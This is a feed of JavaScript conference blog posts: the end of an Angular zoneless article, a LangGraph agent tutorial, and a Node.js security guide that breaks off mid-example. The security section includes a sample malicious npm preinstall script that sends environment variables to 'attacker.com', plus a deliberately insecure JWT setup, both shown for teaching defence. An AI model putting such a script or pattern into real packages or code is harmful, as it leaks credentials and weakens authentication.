  this.rumStockValue.set(this.simulateRumConsumption());
}, 10000);

Angular also gives us a safety net to verify that our app is truly zoneless-ready. By adding provideCheckNoChangesConfig({ exhaustive: true, interval: <milliseconds> }) to app.config.ts, we can enable a periodic debug check that ensures no state changes slip by unnoticed. If Angular detects a binding update that wouldn’t have been refreshed by zoneless change detection, it throws an ExpressionChangedAfterItHasBeenCheckedError. This helps us catch hidden dependencies on Zone.js before they become real issues in production.

Listing 8:

export const appConfig: ApplicationConfig = {
  providers: [
    provideBrowserGlobalErrorListeners(),
    provideZonelessChangeDetection(),
    provideCheckNoChangesConfig({exhaustive: true, interval: 1000}),
    provideRouter(routes),
    provideHttpClient(),
  ]
};


Figure 21: Angular throws ExpressionChangedAfterItHasBeenCheckedError when a binding changes without notifying change detection

With this in place, we now have the full picture: how change detection behaves under different strategies, what pitfalls appear when removing Zone.js, and how tools like signals and the async pipe help us stay in control.


Conclusion: The End of an Era, the Start of Another

Zone.js has been part of Angular from the very beginning, bringing the “magic refresh” that automatically kept UIs in sync. For years, it simplified development and allowed developers to focus on building features instead of managing updates manually. But as applications grew larger and the web evolved, the hidden costs of that magic became harder to ignore: performance overhead, noisy debugging, compatibility issues, and extra complexity in testing.

That’s why the shift to zoneless marks an important milestone in Angular’s evolution. Developers can finally build apps without Zone.js, relying instead on signals, markForCheck, and OnPush-friendly patterns.

Zone.js was magic. Zoneless is mastery. With Angular 20.2, you can finally leave the overhead behind, build apps that are faster and easier to debug, and take full control of change detection. The future of Angular is zoneless. It’s time to join it.

References

  1. Angular documentation
  2. Angular Summer Update 2025

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

Build an AI Agent with JavaScript and LangGraph https://javascript-conference.com/blog/build-ai-agents-javascript-langgraph/ Wed, 17 Sep 2025 07:50:54 +0000 https://javascript-conference.com/?p=108401 Artificial intelligence has evolved far beyond just chat applications. Features powered by large language models (LLMs) are now being integrated into a growing number of apps and devices. Many web platforms offer not only AI chatbots but also intelligent search functions that help users find relevant content, as well as fraud detection systems that use anomaly detection to identify suspicious login attempts or fraudulent online payments. Let’s look at an example of how to build such an application using LangGraph.

One thing all of the systems mentioned have in common is that they accept input and generate output based on their trained knowledge. This output can then be processed by the application and presented to the user. A concrete example of such an AI application is a smart lamp. It has been trained to respond to specific commands such as “Turn on the light,” “Dim the light to 50%,” or “Turn off the light at 10 p.m.” The system is limited by its architecture and training data.

AI agents address this problem. These are software components that are capable of making decisions independently and executing actions based on those decisions. In the example with the smart lamp, one goal for the AI agent could be to always provide the perfect lighting without you worrying about it. The agent observes when you wake up and how lighting conditions change with the weather and time of day. It decides when it makes sense to turn on the light. For instance, if you want to sleep longer on Sundays, the light will turn on later. The actions it takes might include gradually brightening the light in the morning when you wake up or shifting to a warmer color tone in the evening as you wind down. Over time, the AI agent learns more about your habits–for example, preferring to switch to cinema mode when you watch a movie in the evening or using more natural light in the afternoon.

The term AI agent is therefore not a new name for a semi-intelligent chatbot, but refers to software with very specific characteristics:

  • Autonomy: The AI agent can act independently within a certain framework. It does not work purely on a command basis, but continuously observes its environment and acts on its own initiative. This enables it to react to its environment and pursue its goals in the long term. In the case of the smart lamp, this means that you do not have to switch the light on and off yourself. Depending on the application, an AI agent can allow interactions and learn from them. This means that you can still control the light yourself. The agent will then adapt its behavior in the future so that intervention should no longer be necessary.
  • Goal orientation: The actions of an AI agent are usually determined by a specific goal or a combination of several goals.
  • Interaction with complex environments: AI agents play to their strengths above all in dynamic and unpredictable environments. If you work in such an environment with conventional architectures, you have to anticipate a wide variety of cases. An AI agent can respond to events in its environment, adapt its behavior, and get to know its environment better over time. The smart lamp not only takes the time of day into account in its actions, but also your behavior and habits, as well as external influences such as sunrise, sunset, or the weather.
  • Learning over a longer period of time: AI agents can learn from their environment. This includes both dynamic changes in the environment and interactions between people or other systems and the agent. The smart lamp not only turns the light on and off, but also ensures optimal lighting in different situations, whether you are reading a book, watching a movie, or preparing a meal.

For an AI agent to work, you must ensure that it can perceive its environment, give it a goal, and invest a certain amount of time in the initial learning process.

From Idea to Practice: AI Agents in JavaScript with LangGraph

AI agents can be implemented in different languages and on different platforms. The most commonly used languages are currently Python and JavaScript or TypeScript.

The LangChain library exists for both programming languages and lets you implement AI applications as chained modules. LangGraph, a library for modeling and implementing AI agents, comes from the same team. In this article, we use the JavaScript version of the library on Node.js, which stands out for its lightweight architecture and asynchronous I/O.

The library focuses on controlling data flows and states in the application. It allows you to integrate any models and tools. The most important terms in a LangGraph application are:

  • State: The state contains information about the structure of the graph. It also stores the application’s variable data. The graph also has reducer functions that LangGraph can use to update the state.
  • Node: A graph generally consists of nodes and edges. In the specific case of LangGraph, a node is a JavaScript function that contains the agent’s logic. These functions can use an LLM, send queries to a search engine, or execute any local logic.
  • Edge: The edges of the graph connect the nodes of the graph and thus determine which node function is executed next.

A Concrete Example – What Time Is It?

To make things a little less abstract, let’s take a look at a concrete example. With this application, you can ask a locally executed LLM for the current time. If you use a simple local model such as Llama or Mistral, you can draw on an extensive knowledge base and be sure that your personal data will not be used for training purposes or analyzed in any other way, but the model cannot access current or dynamic data such as the date or time. In this example, you enrich the model with a function that returns the current date and time.

The implementation consists of two nodes: model, which is responsible for communicating with the LLM, and getCurrentDateTime, which contains the tool function for the date and time. The code in Listing 1 shows how the nodes are implemented and connected with edges.

Listing 1: LangGraph application with access to time and date

import { AIMessage, HumanMessage } from '@langchain/core/messages';
import { ToolNode } from '@langchain/langgraph/prebuilt';
import { StateGraph, MessagesAnnotation } from '@langchain/langgraph';
import { tool } from '@langchain/core/tools';
import { ChatOllama } from '@langchain/ollama';
import { z } from 'zod';

const getCurrentDateTime = tool(
  async () => {
    const now = new Date();
    const result = `Current date and time in UTC: ${now.toISOString()}`;
    return result;
  },
  {
    name: 'getCurrentDateTime',
    description: 'Returns the current date and time in UTC.',
    schema: z.object({}),
  }
);

const tools = [getCurrentDateTime];
const toolNode = new ToolNode(tools);

const model = new ChatOllama({ model: 'mistral-nemo' }).bindTools(tools);

function shouldContinue({ messages }: typeof MessagesAnnotation.State) {
  if ((messages[messages.length - 1] as AIMessage).tool_calls?.length) {
    return 'getCurrentDateTime';
  }
  return '__end__';
}

async function callModel(state: typeof MessagesAnnotation.State) {
  const response = await model.invoke(state.messages);
  return { messages: [response] };
}

const workflow = new StateGraph(MessagesAnnotation)
  .addNode('model', callModel)
  .addEdge('__start__', 'model')
  .addNode('getCurrentDateTime', toolNode)
  .addEdge('getCurrentDateTime', 'model')
  .addConditionalEdges('model', shouldContinue);

const app = workflow.compile();

const time = await app.invoke({
  messages: [new HumanMessage('What time is it?')],
});
console.log(time.messages.at(-1)?.content);

const timeMuc = await app.invoke({
  messages: [
    ...time.messages,
    new HumanMessage('And what time is it in Munich, Germany?'),
  ],
});

console.log(timeMuc.messages.at(-1)?.content);

The core of the implementation is the ToolNode, which supplies the LLM with current data. You create such a node by calling the tool function. You pass it the function that is to be behind the node. In this example, this function returns the current date and time as an ISO string. In addition to this function, you also define an object with meta information such as the name of the ToolNode, a description, and a schema. The bindTools method of the LLM instance is used to make the tools known. The LLM has access to the meta information and thus knows which tools are available to it for which purpose.

If the LLM receives a request that requires the current time to answer, it does not provide a direct answer, but informs the application that the ToolNode should be executed. In the example, the function can only be executed without receiving any additional parameters. However, you also have the option of defining parameters via the schema that the LLM passes on when called, and which you can access in the Tool function. This allows you to control the execution of this function and deliver a suitable result. It is important to define a description for the values in the schema using the describe method. The tool function does not yet create a node for LangGraph. To do this, you must pass the created object in an array to the constructor of the ToolNode class.

The second node in the graph is the model. In the example, the ChatOllama class is used to integrate a local LLM provided by Ollama. Specifically, the mistral-nemo model is used. Which LLM you choose depends on a variety of factors: Do you want to use a local open-source model such as Mistral or Llama, or would you prefer a commercial model such as GPT-4o from OpenAI? If you decide on a local model, the question arises as to what resources are available to you and whether you should opt for a smaller and therefore more economical model, such as the 3B variant of Llama 3.2, or a large model such as the Llama 3.1 model with 405B parameters. The smaller model can run efficiently on a computer with a standard graphics card. The large models require powerful and therefore expensive hardware.

With these two nodes, you can now proceed to create the state graph for the application. When creating the graph, you pass a structure that defines the state structure and a reducer function for updating the state. LangGraph provides the MessagesAnnotation, which only provides a state key with the name messages and the associated reducer. The instance of the StateGraph class has the methods addNode for adding nodes and addEdge for connecting the nodes. Figure 1 shows the graph for the example.


Figure 1: Structure of the application graph

The graphical representation reveals another special feature. You can use the addConditionalEdges method to insert a branch. Implement this in the shouldContinue function. It receives all messages and checks whether the last message from the model contains a Tool call. If this is the case, the process is forwarded to the ToolNode. Otherwise, the run is terminated. A complete run through the graph looks like this:

  1. The edge labeled start marks the start of the graph and connects it to the model.
  2. The model node is executed. The model receives the prompt, processes it, and returns the result.
  3. The edge inserted with the addConditionalEdges method checks whether a Tool call is required. If this is not the case, the run is terminated with end. Otherwise, the edge connects the model to the ToolNode.
  4. The ToolNode is called and returns the current date and time.
  5. The edge connecting the ToolNode and the model ensures that the state enriched by the output of the Tool function is made available to the model.
  6. The model receives the extended prompt and can generate a response.
  7. The model does not require any further Tool calls, and the application is terminated by the conditional edge.

The compile method of the StateGraph instance creates an executable application to which you can pass any prompt using the invoke method. Assuming you call the application on December 1, 2025, at 3:02 p.m., you will receive the output “It’s currently 3:02 PM on December 1st.” As shown in the example, if you execute the invoke method again and pass the message history, the application does not execute another Tool call and uses the information from the previous run.

This example uses a tool node to counteract a weakness of LLMs: they know nothing about current or dynamic data. It also demonstrates the essential features of a LangGraph application, as well as the limitations you face when integrating smaller language models. The responses are not always consistent. For most queries, the model gives a correct answer. The time returned here is in the UTC time zone. If you ask for the current time in a different time zone, as in the second prompt, you may get the correct answer, but you may also find that Munich has suddenly moved to a time zone 6 hours behind UTC. In addition, during testing, the results for German-language queries were noticeably worse than for their English equivalents. To solve the time zone problem, you could, for example, register another tool that resolves time zones correctly and uses this information to obtain the right time.
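Such a time-zone tool does not need an LLM at all: Node’s built-in Intl API resolves IANA time zones reliably. The helper below is a minimal sketch (its name is invented, not from the article’s code); to expose it to the model, you would wrap it with tool() and a zod schema exactly as in Listing 1:

```typescript
// Resolve the current time in a given IANA time zone using the Intl API.
// Illustrative helper, not part of the article's code; wiring it up as a
// LangGraph tool works the same way as getCurrentDateTime in Listing 1.
function timeInZone(timeZone: string, now: Date = new Date()): string {
  return new Intl.DateTimeFormat('en-US', {
    timeZone,
    dateStyle: 'medium',
    timeStyle: 'long',
  }).format(now);
}
```

For 'Europe/Berlin' in winter this produces something like “Dec 1, 2025, 4:02:00 PM GMT+1”, so the model no longer has to guess UTC offsets.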

This example already shows the essential features of a LangGraph application. The application consists of several nodes connected by edges. This architecture allows you to create both simple and very complex applications by assembling them from small, loosely coupled building blocks. The application gains additional flexibility because you can exchange nodes or insert new ones. You can also create conditions and thus take different paths through the graph at runtime. Although the time announcement example demonstrates some basic architectural features of LangGraph, it is still a long way from a real AI agent. For this reason, we will now look at another example of a LangGraph application that will introduce you to further features of an AI agent and show you other possible uses for the library.
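The loosely coupled structure described above can be illustrated with a tiny executor in plain TypeScript. This toy is entirely independent of LangGraph and all names are invented: nodes are functions from state to a partial state update, and a conditional edge picks the next node by name.

```typescript
// Toy illustration of the state/node/edge idea (not LangGraph itself).
type State = { value: number; log: string[] };
type GraphNode = (s: State) => Partial<State>;

const nodes: Record<string, GraphNode> = {
  double: (s) => ({ value: s.value * 2, log: [...s.log, 'double'] }),
  finish: (s) => ({ log: [...s.log, 'finish'] }),
};

// Conditional edge: keep doubling until the value reaches 10, then finish.
function nextNode(current: string, s: State): string {
  if (current === 'finish') return '__end__';
  return s.value < 10 ? 'double' : 'finish';
}

function run(start: string, initial: State): State {
  let state = initial;
  let current = start;
  while (current !== '__end__') {
    state = { ...state, ...nodes[current](state) };  // reducer-style merge
    current = nextNode(current, state);
  }
  return state;
}
```

LangGraph’s StateGraph takes over this kind of bookkeeping for you and adds state reducers, persistence, and tool integration on top.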

Another Example: The Digital Shopping Cart

The following example relies less on an LLM to control the application and instead integrates an LLM for one very specific task. The rest of the application consists of a simple graph with a few additional nodes. The application evaluates images of products and recognizes which products are depicted and how many. The products are placed in the shopping cart, and the prices for the individual products and for the entire cart are calculated. At the end, the application prints the shopping cart as a table. The application is based on Node.js and is operated from the command line; the product images are stored in the file system and read in when needed.

One of the most common use cases for a LangGraph application is a chatbot. That’s why LangGraph also provides the MessagesAnnotation, which allows you to implement a message-based system without any further changes. However, you are not limited to this structure, but can model the state as you wish. The basis for this is provided by LangGraph’s Annotation structures. The GraphState of an application is structured like a tree and has a root node that you define with Annotation.Root. This then contains any object structure. Listing 2 shows how the GraphState of the sample application is structured.

Listing 2: Generating the GraphState

const schema = z.object({
  totalPrice: z.number(),
  cart: z.array(
    z.object({
      image: z.string(),
      name: z.string().optional(),
      price: z.number().optional(),
      quantity: z.number().optional(),
    })
  ),
});

type StateType = z.infer<typeof schema>;
type CartItem = StateType['cart'][number];

const cartAnnotation = {
  totalPrice: Annotation<number>,
  cart: Annotation<CartItem[]>,
};

const State = Annotation.Root(cartAnnotation);

The GraphState contains two fields: the total price in the totalPrice property and the shopping cart in the cart property. You model the details of the state using LangGraph’s Annotation functions. These are implemented as TypeScript generics so that you can pass the type of the respective property. The total price is a simple number, and the shopping cart consists of an array of objects representing the individual products. If you do not specify anything else in the Annotation functions, LangGraph will overwrite the previous value in the state when a change is made. Alternatively, you can call the Annotation function and pass it an object with a reducer function and a default value. The reducer is then responsible for generating the new state of the StateGraph from the previous state and additional data. In our example, the node functions of the application itself take care of updating the state, so no separate reducer function is required.
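To make the overwrite-versus-merge distinction concrete, here is a minimal sketch of the kind of reducer you could pass to an Annotation. The reducer itself is just a plain function, so it is shown standalone and testable; the commented-out Annotation wiring is illustrative, and its exact signature may differ between LangGraph versions.

```javascript
// A reducer combines the previous state value with an update.
// Here it appends new cart items instead of overwriting the whole array.
function cartReducer(previous, update) {
  return previous.concat(update);
}

// Illustrative wiring (not executed here; check LangGraph's JS API docs):
// const cart = Annotation({ reducer: cartReducer, default: () => [] });

const afterFirst = cartReducer([], [{ image: 'DSC_0435.jpg' }]);
const afterSecond = cartReducer(afterFirst, [{ image: 'DSC_0436.jpg' }]);
// afterSecond holds both items; the default (overwrite) behavior would
// have kept only the second update.
```

Because `concat` returns a new array, the previous state is never mutated, which keeps state transitions easy to reason about and to persist.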

The state not only represents the current state of the application, but also serves to exchange information between the individual nodes. The nodes do not simply pass information to each other, but store it in the state. This has the advantage that the state of the application can be better understood. This makes the application more flexible, as you are not dependent on fixed interfaces between the nodes. If you persist the state, you can pause the execution of the application and continue at the same point without losing any data.

In addition to the state, the nodes and edges of the graph are the most important building blocks of the application. Figure 2 shows the nodes of the application and their connections. In the following, you will learn about the special features of the individual nodes and how they interact.

Figure 2: Visualization of GraphState

AskForNextProduct – Which Product Should Be Added?

The askForNextProduct node starts the process. It uses the Readline module from Node.js to query user input on the command line. The application expects the name of a file containing the image of a product. For example, you can enter “DSC_0435.jpg.” A file with this name must then be located in the application’s input directory and will be read in later in the graph. The node only takes care of querying the file name and must pass it on to the next node in the graph. So you need to save this info in the GraphState. To do this, the node adds a new element to the cart array and writes the file name to the image field. Entering a file name is a simplification for this app. At this point, you can implement any image source you want. For example, you can create a front end for the app and upload the images via the browser.

askForNextProduct has a special feature because it is connected to the detectProduct and showCart nodes via a ConditionalEdge. If you enter the string finished, this means that no further products should be added to the shopping cart and the shopping cart should be displayed. In this case, the ConditionalEdge calls the showCart node. In all other cases, the application continues with the detectProduct node to identify the product.

DetectProduct – Product Recognition with a Vision Model

In the example in Listing 3, the detectProduct node uses the llama3.2-vision:11b model for image recognition. The prompt is important here. You specify the context, i.e., that the model is to be used for product recognition and that the number of products found is to be counted. You also specify the output format in the form of a JSON string with a concrete example. You can pass both the name of the file and a Base64-encoded image directly to the Ollama library used here. Formulating the prompt this way makes it very likely that the model returns valid JSON, which the node parses and inserts directly into the last element of the shopping cart array in GraphState.

Listing 3: detectProduct ToolNode

const detectProduct = tool(
  async (state: StateType): Promise<StateType> => {
    console.log('Detecting product...');

    const { message } = await ollama.chat({
      model: 'llama3.2-vision:11b',
      messages: [
        {
          role: 'user',
          content: `You are a vision model for a pet shop. What 
            product do you see and how many are there. Answer in 
            the following json string structure 
            { "name": "name", "quantity": 1}`,
          images: [`./input/${state.cart[state.cart.length - 1].image}`],
        },
      ],
    });
    const visionModelResponse = JSON.parse(message.content);

    const clonedState = { ...state };
    clonedState.cart[clonedState.cart.length - 1] = {
      ...clonedState.cart[clonedState.cart.length - 1],
      ...visionModelResponse,
    };
    return clonedState;
  },
  {
    name: 'detectProduct',
    description: 'Detects a product.',
    schema,
  }
);

CalculatePrice – Read Data from the Database

The calculatePrice node is another simplification in our example. It reads the name of the product from the last element of the shopping cart array and uses it for a database query. The result is the price of the product you are looking for. You can make the search for the right product as complex as you like. A simple extension would be to normalize the spelling so that it doesn’t matter whether you search for “apple” or “apples.” You can also use a smart, AI-based product search, which significantly improves the application but in most cases also significantly increases the response time.
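As a sketch of that normalization idea (an extension suggested here, not part of the original application), a lookup key can be derived by lowercasing and stripping a trailing plural “s”:

```javascript
// Naive product-name normalization so that "Apples" and "apple" resolve to
// the same database key. Deliberately simplistic and English-only; a real
// system would use stemming or a fuzzy product search instead.
function normalizeProductName(name) {
  const lower = name.trim().toLowerCase();
  return lower.length > 1 && lower.endsWith('s') ? lower.slice(0, -1) : lower;
}

// normalizeProductName('Apples') and normalizeProductName('apple')
// both yield 'apple'.
```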

In the example, we assume that a match was found for the image and the product name derived from it. The calculatePrice function adds the price to the corresponding shopping cart item and passes control to the calculateTotalPrice node configured in the application.

CalculateTotalPrice – Calculate the Sum

The calculateTotalPrice node is an example of a very simple operation. It uses the Array-reduce function to calculate the sum of the prices of all items in the shopping cart. In theory, you could also have a language model perform operations like this, but a calculation in the source code has the advantage that it always works, and you don’t have to worry about the language model starting to hallucinate and adding or omitting products or simply changing prices on its own. The code in Listing 4 also shows a simplification of LangGraph that allows you to update only part of the GraphState.

Listing 4: calculateTotalPrice ToolNode

const calculateTotalPrice = tool(
  async (state: StateType) => {
    console.log('Calculating total price...');
    const totalPrice = state.cart.reduce((acc, item) => {
      return acc + item.price! * item.quantity!;
    }, 0);
    console.log(`Current total price: ${totalPrice}`);
    return { totalPrice };
  },
  {
    name: 'calculateTotalPrice',
    description: 'Calculates the total price of the cart.',
    schema,
  }
);

As with the totalPrice property, if you only specify the structure of part of the GraphState, LangGraph will only update that part. Here, another standard behavior of the library comes into play. If you do not define a reducer function when creating the GraphState, LangGraph will overwrite the value with the update. For a simple number, this behavior is not a problem. However, with an object structure such as the cart state, this can become a problem. Here, you can implement the desired behavior yourself using a reducer.

After updating the total price, the loop in the StateGraph closes and the askForNextProduct node waits for the next input until the cycle is interrupted by the input of finished and the entire shopping cart is displayed.

ShowCart – Displaying the Shopping Cart

Before the application is terminated, the shopping cart is displayed on the console. The showCart node uses the console.table function for this purpose and draws its data from the GraphState. This node only accesses the state in read-only mode and outputs it unchanged as the return value. It is also the last node of the StateGraph and is connected via an edge to the end node, which terminates the application.

The Nodes and Edges of the Application

As in the previous example, you use the StateGraph class, to which you pass the configured state during instantiation. Use the addNode, addEdge, and addConditionalEdges functions to define the nodes and connect them with edges. Call the compile function on the resulting object and then start the application by calling the invoke method, as shown in Listing 5.

Listing 5: Registration of nodes and edges

const graph = new StateGraph(State)
  .addNode('detectProduct', detectProduct)
  .addNode('calculatePrice', calculatePrice)
  .addNode('calculateTotalPrice', calculateTotalPrice)
  .addNode('showCart', showCart)
  .addNode('askForNextProduct', askForNextProduct)
  .addEdge('__start__', 'askForNextProduct')
  .addEdge('detectProduct', 'calculatePrice')
  .addConditionalEdges('askForNextProduct', showCartOrDetectProduct as any)
  .addEdge('calculatePrice', 'calculateTotalPrice')
  .addEdge('calculateTotalPrice', 'askForNextProduct')
  .addEdge('showCart', '__end__');

const app = graph.compile();

app.invoke({ totalPrice: 0, cart: [] });

When starting, you pass an initial state structure and enter the StateGraph. The graph of this application describes a circle. Here, you must be careful not to accidentally construct an infinite loop. LangGraph defines a limit of 25 cycle runs before it throws a GraphRecursionError. However, this only occurs if you do not integrate an interruption. This is relevant for the example because the keyboard input in the askForNextProduct node is not considered a termination condition for the cycle. The size of your application’s shopping cart is therefore limited by this restriction. To mitigate the restriction and increase the shopping cart size, pass an object with the property recursionLimit as the second argument to the invoke method when starting the application and define a value greater than 25. Of course, you can also pass a smaller value to test the effects of the restriction.

Conclusion

If your AI application consists solely of direct communication with a language model, it is usually sufficient to use the appropriate npm package, such as OpenAI or Ollama. However, if you want to integrate the model into a larger application context and use additional information sources or implement your own logic, an additional library is recommended. One example of this is LangChain. This tool allows you to flexibly link the individual components of your application together to form a chain. However, this architecture reaches its limits, especially in larger and more complex use cases. LangGraph, from the creators of LangChain, extends the architecture of an AI application to a graph in which you have the option of branching and looping.

The advantage of this graph architecture is that you can assemble your application from individual nodes. The connections between these nodes and the edges determine the flow of the application, but not the data flow. The data in the graph is stored in the state, an object structure that you can design according to your needs. This central state allows you to persist the state of your application and pause your application if necessary, and resume it at a later point in time.

The nodes are independent of the actual application, so you can move the implementation to a library or package and achieve reusability across application boundaries. All you have to do is make sure that the underlying state structure fits, which is easy with Zod for schema definition, validation, and TypeScript.

The post Build an AI Agent with JavaScript and LangGraph appeared first on International JavaScript Conference.

Preventing Dependency Risks and Authentication Flaws in Node.js https://javascript-conference.com/blog/node-js-dependency-authentication-security-part-2/ Tue, 05 Aug 2025 12:04:38 +0000 https://javascript-conference.com/?p=108252 Node.js revolutionized the web development paradigm with its event-driven, non-blocking architecture and is used for building scalable applications. But with its popularity, comes more attention from malicious actors looking to take advantage of vulnerabilities. This article examines the growing security challenge surrounding dependency risks, authentication flaws, rate limiting, and more.

In Part 1 of our series, we explored some of the most common attack vectors against Node.js applications, from SQL injection and NoSQL injection to Cross-Site Scripting (XSS) attacks. But these threats are only part of the security issues Node.js developers face today.

In this second part of our series, we will discuss lesser-known but no less dangerous threats specifically targeting Node.js applications. From prototype pollution to insecure deserialization, authentication flaws to server-side request forgery – understanding these threats and their remediation strategies is crucial for secure application development in the current threat environment. Learn all about these Node.js security risks and how to prevent them.

Dependency Risks in the JavaScript Ecosystem

Much of the JavaScript ecosystem’s risk stems from its reliance on dependencies. A typical Node.js project depends on hundreds of third-party packages, a huge attack surface that isn’t contained in your own code, as recent supply chain attacks on popular npm packages have demonstrated. Frameworks like Express.js, Fastify, and NestJS provide some protection, but not every security threat can be guarded against at the framework level. The duty remains with developers to include security checks and measures at every stage of the application development process.

Topic 1 – Node.js Security & Dependency Management Vulnerabilities

Outdated Packages and Security Implications

It’s normal for modern Node.js applications to depend on several dozen or even hundreds of dependencies. Each outdated package is a potential security hole that’s left unpatched in your application.

The npm ecosystem is quite dynamic and vulnerabilities are often uncovered and patched within widely used packages. This means that dependencies that aren’t regularly updated can put your application at risk of being exploited while the fix is available.

Example: Say a team is using the popular lodash package v4.17.15 in their application. This package version has a prototype pollution vulnerability that was fixed in version 4.17.19. This vulnerability lets attackers manipulate prototypes of JavaScript objects and, in certain circumstances, cause application crashes or even remote code execution.

This type of vulnerability is particularly dangerous because lodash is a dependency of over 150,000 other packages, which means it’s spread throughout the ecosystem. The longer teams delay updates, the longer their applications are vulnerable.
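To see why prototype pollution is so dangerous, here is a self-contained demonstration of the general mechanism using a naive deep merge. This is illustrative only, not lodash’s actual code, but it shows the same bug class the advisory describes.

```javascript
// Naive recursive merge with no key filtering -- the general shape of the
// prototype pollution bug class (illustrative, not lodash's implementation).
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      if (typeof target[key] !== 'object' || target[key] === null) {
        target[key] = {};
      }
      // For key "__proto__", target[key] is Object.prototype itself
      naiveMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// JSON.parse creates "__proto__" as an ordinary own property...
const attackerPayload = JSON.parse('{"__proto__": {"isAdmin": true}}');
naiveMerge({}, attackerPayload);

// ...but the merge walked up into Object.prototype, so EVERY object is affected:
console.log(({}).isAdmin); // true

delete Object.prototype.isAdmin; // clean up the pollution
```

In a real application the polluted property might be a role flag or a template option checked elsewhere, which is how this escalates to authorization bypass or remote code execution.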

Mitigation Strategy: Audit the packages at regular time intervals.

# Identify vulnerabilities in your dependencies
npm audit

# Fix vulnerable dependencies
npm audit fix

# For major version updates that npm audit fix can't automatically resolve
npm audit fix --force

Supply Chain Attacks

Supply chain attacks focus on the trusting relationship between developers and package maintainers. Malicious actors inject code into the supply chain to compromise a trusted package or its distribution channel.

Example Scenario: The event-stream incident of 2018 demonstrated the risks perfectly. A malicious actor was able to gain the trust of the package maintainer and was granted publishing rights to the package. They injected cryptocurrency stealing code that targeted Copay Bitcoin wallet users.

Attack Workflow:

  1. Attacker identifies a popular package with an inactive maintainer
  2. Attacker offers to help maintain the package
  3. Original maintainer grants publishing rights
  4. Attacker publishes a new version with malicious code
  5. Downstream applications automatically update to the compromised version

Mitigation Strategies: In package.json, use exact versions instead of ranges.

//In package.json, use exact versions instead of ranges
{
  "dependencies": {
    "express": "4.17.1",  // Good: exact version
    "lodash": "^4.17.20"  // Risky: accepts any 4.x release at or above 4.17.20
  }
}

//Use package-lock.json or npm shrinkwrap to lock all dependencies

//Example using npm-package-integrity:
const integrity = require('npm-package-integrity');

integrity.check('./package.json').then(results => {
  if (results.compromised.length > 0) {
    console.error('Compromised packages detected:', results.compromised);
    process.exit(1);
  }
});

Dependency Confusion Attacks

Dependency confusion attacks exploit package managers that resolve dependencies from both public and private registries. If a package with the same name as one of your private packages is published to the public registry with a higher version number, the package manager may pull the malicious public version instead of your private one.

Example Attack Scenario: Your company uses a private package called @company/api-client 1.2.3. The attacker identifies this package name in your public repository’s package.json and releases a malicious package with the same name but version 2.0.0 to the public npm registry. When you install the malicious package, npm will find the higher version in the public registry and install the package from the attacker.
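The resolution logic can be illustrated with a simplified version comparison. This is an illustrative sketch of why the higher public version wins; npm’s real resolver additionally honors semver ranges, lockfiles, and registry configuration.

```javascript
// Naive comparator for plain x.y.z versions (no prerelease tags) --
// just enough to show the "highest version wins" resolution rule.
function compareSemver(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] - pb[i];
  }
  return 0;
}

const privateVersion = '1.2.3'; // @company/api-client in your internal registry
const publicVersion = '2.0.0';  // attacker's package on the public npm registry

const resolved = compareSemver(publicVersion, privateVersion) > 0
  ? publicVersion
  : privateVersion;
// resolved === '2.0.0' -- the malicious public package is selected
```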

Example Workflow: when the malicious package is installed, npm runs its preinstall script automatically, which can exfiltrate data from the build machine.

// Malicious package preinstall script
// This runs automatically when the package is installed
const fs = require('fs');
const https = require('https');

// Stealing environment variables
const data = JSON.stringify({
  env: process.env,
  path: process.cwd()
});

// Sending data to attacker's server
const req = https.request({
  hostname: 'attacker.com',
  port: 443,
  path: '/collect',
  method: 'POST',
  headers: {'Content-Type': 'application/json'}
}, res => {});

req.write(data);
req.end();

Mitigation Strategies:

Use Scoped Packages: Scoped packages in npm help ensure that your packages are uniquely identified. For example, use @yourcompany/package-name instead of just package-name.

{

  "name": "my-project",

  "version": "1.0.0",

  "dependencies": {

    "@yourcompany/internal-package": "1.2.3"

  },

  "publishConfig": {

    "registry": "https://registry.yourcompany.com"

  }

}

In this example, the following measures are taken:

  • The package is scoped with @yourcompany to ensure uniqueness.
  • The publishConfig ensures that the package manager uses your private registry.

Topic 2 – Authentication Flaws Threatening Node.js Security

JSON Web Token (JWT) Vulnerabilities – JWTs are among the most common means of authentication in Node.js apps, particularly for RESTful APIs. However, they are frequently implemented insecurely.

Common JWT Vulnerabilities:

  1. Weak Signing Algorithms: Accepting the none algorithm or using HMAC with short, guessable keys.
  2. Insecure Token Storage: Saving tokens in localStorage instead of using HttpOnly cookies.
  3. Missing Token Validation: Failing to verify a token’s signature, expiration, issuer, or audience.
  4. Hardcoded Secrets: Using hardcoded secrets in the source code.

Example of Vulnerable JWT Implementation:

const jwt = require('jsonwebtoken');

// Hardcoded secret in source code
const secret = 'mysecretkey';

app.post('/login', (req, res) => {
  // Create token with no expiration or audience validation
  const token = jwt.sign({ userId: user.id }, secret);
  res.json({ token });
});

app.get('/protected', (req, res) => {
  try {
    // No token validation or structure checks
    const token = req.headers.authorization.split(' ')[1];
    const decoded = jwt.verify(token, secret);

    // No additional checks on decoded token content
    res.json({ data: 'Protected resource' });
  } catch (error) {
    res.status(401).json({ error: 'Unauthorized' });
  }
});

In the above example code, there are multiple issues:

Hard Coded Secret

  • Problem: The secret key is stored in the source code.
  • Risk: If the source code is revealed, the secret key can be easily guessed.

No Token Expiration

  • Problem: The JWT is created without an expiration date.
  • Risk: Once issued, tokens can be used for an indefinite period of time if they are compromised.

Plain Text Token Transmission

  • Problem: The token is sent in plaintext in the response.
  • Risk: If tokens aren’t sent over HTTPS, they can be easily intercepted.

No Token Validation or Structure Checks

  • Problem: The token is extracted and verified without checking its claims.
  • Risk: Malformed or tampered tokens can bypass security checks.

Improved code with Secure JWT Implementation:

const jwt = require('jsonwebtoken');
const fs = require('fs');
require('dotenv').config();

// Load JWT secret from environment variable
const secret = process.env.JWT_SECRET;
if (!secret || secret.length < 32) {
  throw new Error('JWT_SECRET environment variable must be set with at least 32 characters');
}

app.post('/login', async (req, res) => {
  // Create token with proper claims
  const token = jwt.sign(
    {
      userId: user.id,
      role: user.role
    },
    secret,
    {
      expiresIn: '1h',
      issuer: 'my-app',
      audience: 'my-api',
      notBefore: 0
    }
  );

  // Send token in HttpOnly cookie
  res.cookie('token', token, {
    httpOnly: true,
